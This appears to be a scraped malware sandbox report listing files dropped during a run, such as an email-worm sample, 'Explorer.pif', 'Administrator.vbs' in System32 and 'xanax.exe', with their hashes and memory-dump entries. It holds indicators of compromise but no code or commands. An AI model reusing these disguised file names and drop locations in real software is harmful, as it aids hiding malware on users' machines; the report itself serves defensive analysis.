71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

SHA512
1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
378B

MD5
61e267d145255776e39c35288462d6f4

SHA1
9f09d1f508670f61397fe98eb1394f26efc49a02

SHA256
5331e7b53c23a0932d1e73b1af291f57bb64360f2f6911b8b91f55e7c8dff2da

SHA512
4546272fb3e95d00d5ab0f75ef42a87103af64416298e749417aa48ca1eedd1f53342f431336488f8a6e7cc94c9f7dd97715c7029d12d553ad3fc0ff0ca941df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
447B

MD5
7d2dd4c9c508aff47bf46336122da094

SHA1
a4d37be0a9fb5b884565679ce6b71a9210e47090

SHA256
11ea765f6f5df88721a4b8c42a40bd760adffcece8c8432432d5e75ca1dd210f

SHA512
6c91b9fec546de31992ebb006aa7e0b87d96bab08d26fe5b5717a64a91ad47cfe99e6af6b7bb5bbfc84b0fe273b0592fa70c1dac9c36ba39f1783c54f655e020

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
9KB

MD5
8b91183986cd11d92b6a22e485e06da9

SHA1
61f086bd9584f07319be4293b78392a42f11b8d9

SHA256
3e6456077f05a3eb824a088ef4960350ef8b5969eb61f79c2803ae5d7c56b4fa

SHA512
8956534480486e185fb934cb490288691afb0a617d9a13777f7491f576c84d9eb6e2eed12ca43818980b0f65c954b0824834ef0e8cbae5a5b7a9e6d262fc60ae

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
7KB

MD5
5db3fa1403efeafa6c8de23a89be0caa

SHA1
a44c24795e014ffe25b8b68b1908503f78eff97e

SHA256
57ba7b5e5644a8ce4675d0c4e246ea89bc85620671bfa629a901e025d164ab5b

SHA512
4bd1c30a963ac1456c28392abe712c9a33cf45865c129132d64a67b54d766bc5124c5b132e7d03389540a95fb0533aa8e376f6586b2f1c682699f9b133904b86

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
7KB

MD5
704bb1c15830cb0d4f40063978bbcc0a

SHA1
94e1a292ae742475703d00e3da903dd61d15cf10

SHA256
13ec050502e6375a60f54ab4087bfe11c18db955617c775314943f654afd38f2

SHA512
429fc2e43bfdbee011410d4d85a9cb32963b7eb719855e2eba2d1c3ef90290def89f930f0084b62598ac22d594859ad1e68259d3ae5641ea965452967cdde85a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
09e8f294fbaeda20563c81fc05dbd829

SHA1
6a5a89cabefcbbcfa627cb50120dad52c4efcdfd

SHA256
cb5bd6474e2c913429504726584d8a3fc8a9e6cc480f5c15145658beee23266d

SHA512
bb70bf2220a503160b8c00950c5e41f01d426f67ce6c4042cef58a8d613aca177b62bf151d6080de4368fbc64c81450efcb7b74f9b8e260680237a5d55c211aa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
c6d806a0c141db34885c5c947ce1f156

SHA1
aead86f9fa018998c73b91574dc5a93b90c24678

SHA256
014baa5decaf5b8f751b4ff5c85c672bb36be5c719ed758f9d3c2f31dc73d97b

SHA512
d98aa59660a5dfff4a8a7776968967cc06ef12461f6ad0eb3943fe13be71da8f1fe85aa1ee608c5ee55a2ca808a2e574883c5d12d94d4a2bc5bcee81d6f5fde0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
82c196efe193ffc965bb0fbd6be0c101

SHA1
5540fb438c3082f46673b93b74a44b168af691dc

SHA256
161ae3c94e71c3d22c6b1900a373e1729f9c70ff19a34201c7c75f09d0a978d0

SHA512
96d7479f9d4cd58f45dd4a6e1c608117ba80daf5fc8d7538b5f4b9568913de71b72178e8b4ccaeaaeba9b93a87418c54169ed7fd46201afe07af8564c7202f73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
2KB

MD5
28a8356c3b2b1180dc2a8b3a9a2c72a7

SHA1
20c703c08a28df1d91704149806ed0aed44ebe01

SHA256
0fa5d618abf3fad909dadd19d5414ed81ca37c6f8e438bed29e0f98985ae72b3

SHA512
a588ac4d93f2374e9f44704b6c8566994bb8d028567f971021e58029c797818e7cf1c73b27925cef64c34cee772ad4338fa95a2aac9e2bab26ce8ec28eb356c8

Download Submit
C:\Users\Admin\Desktop\Explorer.pif

Filesize
89KB

MD5
e79d0b1a342712ea9b96104086149d65

SHA1
a10177aafebb035e104eb22d30bdacb3894e0e1e

SHA256
e68ebecd17bb8e91079bd4fe9bd24059a2bc007b4baac477127eda7c5d5c6706

SHA512
f8cf1b773024784fe28f29af2200ad1d8f333b0dc251a1d39bef5a988c0c08c24328a6d9bbeea0370454c46c76835887f4792a55ec4f21608fa60b26977f27bf

Download Submit
C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Axam.a.exe

Filesize
119B

MD5
d6174dce867e791a3a08df6b8b772598

SHA1
b777cc1c3538f92212c36d8bdf5665b5e0976b0f

SHA256
47b92d9da91c884b7cb01ba401b5591c7b5cec7d24abc2b08a2d72a86eca8576

SHA512
cb1c36e8297cea3f173263d3a01d00c5cb2669a2d13a3fb1849132bb345400ed9be5affdade63fcd5eddafdfa6990e868befe02d37777f9995ed4272371bb937

Download Submit
C:\Windows\System32\Administrator.vbs

Filesize
33KB

MD5
9fa10e6f6bb6d27a7c811843ef215047

SHA1
ff7617fcb73474c28a1f768ad4c56a808b44d925

SHA256
9b3d142b8e6bd75379fc58328631cd7bee3679195ff1eb247e542661de120ec7

SHA512
779ef258ec009d115a537cf6d9143baadb70d05e4d29a74fab853e8a8d737e4aac91cfe1d8de52e00f61cb37b4e1e2ebc5aee23245839555d80f18e7641f65d8

Download Submit
C:\Windows\System\xanax.exe

Filesize
33KB

MD5
df24e1ccceb3c75dada950a1c1abca4d

SHA1
dc8120829a5593a3246d7bad126420282feaabca

SHA256
910c03d210381f0443bfcefe682717f28378dcfe5415071dd127a9837a97b0a6

SHA512
0df46654815eaeb13eca7e2bcd0fff6c62f34ddebe237dda41fc8dabfbf3512ceb12ef06a7c2bf9fcc52e0a4f87a886743b541d5b5b616eb9954e83892c429c7

Download Submit
memory/1064-2600-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-3325-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-2804-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-4363-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-3317-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-3064-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-2345-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-2605-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1064-2602-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/1888-2519-0x0000025DA5EA0000-0x0000025DA5EC2000-memory.dmp

Filesize
136KB

Download
memory/2420-2351-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

Filesize
64KB

Download
memory/2420-2598-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2597-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2599-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2596-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2346-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2348-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2347-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2352-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

Filesize
64KB

Download
memory/2420-2349-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/2420-2350-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/3928-2617-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/3928-2619-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/4100-2286-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2285-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2284-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2338-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2288-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

Filesize
64KB

Download
memory/4100-2283-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2282-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2287-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

Filesize
64KB

Download
memory/4100-2339-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2341-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4100-2340-0x00007FF834450000-0x00007FF834460000-memory.dmp

Filesize
64KB

Download
memory/4200-2344-0x0000000000400000-0x0000000000AAD000-memory.dmp

Filesize
6.7MB

Download
memory/4604-2620-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-3324-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-2806-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-3298-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-3315-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-4356-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-3319-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-3035-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-2669-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-3328-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4604-2643-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/4756-2668-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4756-2805-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4756-2631-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads